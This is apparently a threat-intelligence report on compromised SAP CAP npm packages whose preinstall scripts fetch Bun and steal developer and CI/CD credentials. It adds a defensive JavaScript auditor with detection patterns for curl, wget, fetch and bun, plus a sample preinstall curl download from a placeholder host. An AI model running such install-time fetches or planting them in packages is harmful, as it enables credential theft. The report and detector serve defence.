Supply Chain Attack Hits SAP CAP and Cloud MTA npm Packages
Essential information
- Published: 30/04/2026 00:12
- Modified: 30/04/2026 07:47
- Tags: 2026-04-30 bun-binary ci-cd-compromise credential-theft github abuse npm packages obfuscation sap-cap supply chain attack
- Related entities: 4 observables, 1 intrusion sets (apt), 1 others
Description
Multiple npm packages in the SAP JavaScript and cloud application development ecosystem were compromised in a suspected supply chain attack. Affected packages include [email protected], @cap-js/[email protected], @cap-js/[email protected], and @cap-js/[email protected]. The compromised versions introduced malicious preinstall scripts that download and execute Bun binaries from GitHub, then run heavily obfuscated payloads designed to harvest credentials from developer machines and CI/CD environments. The payloads steal SSH keys, cloud credentials, npm tokens, GitHub access, cryptocurrency wallets, and CI/CD secrets directly from runner memory. Stolen data is encrypted and exfiltrated via GitHub repositories created under victim accounts. The malware also attempts self-propagation by injecting itself into additional packages using stolen npm tokens and establishes persistence through VSCode and Claude IDE configurations.
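Because the compromised versions rely on a preinstall script that runs automatically during installation, a dependency tree can be triaged by listing every install-time lifecycle hook and ranking the commands. The following is an added example, not code from the affected packages or from this report; the function name, indicator patterns and sample manifests are constructed assumptions based on the description above, not published indicators.

```javascript
// Added example: flag npm lifecycle hooks that run automatically at install time.
// Indicator patterns are assumptions drawn from the description, not published IoCs.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
const INDICATORS = [
  { reason: "downloads over the network", re: /\b(curl|wget|fetch)\b|https?:\/\//i },
  { reason: "references GitHub", re: /github(usercontent)?\.com/i },
  { reason: "invokes the Bun runtime", re: /\bbun(\.exe)?\b/i },
  { reason: "runs an inline or bundled script", re: /\bnode\s+(-e\b|\S+\.js)/i },
];

// manifests: array of parsed package.json objects (hypothetical helper).
function auditInstallHooks(manifests) {
  const findings = [];
  for (const pkg of manifests) {
    const scripts = pkg.scripts || {};
    for (const hook of INSTALL_HOOKS) {
      const cmd = scripts[hook];
      if (typeof cmd !== "string") continue;
      const reasons = INDICATORS.filter((i) => i.re.test(cmd)).map((i) => i.reason);
      findings.push({
        package: `${pkg.name}@${pkg.version}`,
        hook,
        command: cmd,
        // Every install hook deserves review; matched indicators raise the priority.
        severity: reasons.length >= 2 ? "high" : reasons.length === 1 ? "medium" : "review",
        reasons,
      });
    }
  }
  // Highest number of matched indicators first.
  return findings.sort((a, b) => b.reasons.length - a.reasons.length);
}

// Constructed sample manifests (hypothetical names, not the affected packages).
const SAMPLE_MANIFESTS = [
  { name: "example-clean", version: "1.0.0", scripts: { test: "jest" } },
  { name: "example-native", version: "2.3.1", scripts: { install: "node-gyp rebuild" } },
  { name: "@example/tampered", version: "9.9.9", scripts: { preinstall: "node setup.js" } },
  { name: "@example/fetcher", version: "0.0.1", scripts: {
    preinstall: "curl -L https://github.com/example/placeholder/releases/download/v0/bun.zip -o bun.zip" } },
];
```

Pass it the parsed `package.json` of every directory under `node_modules`. Installing with `npm ci --ignore-scripts` keeps these hooks from executing while the findings are reviewed.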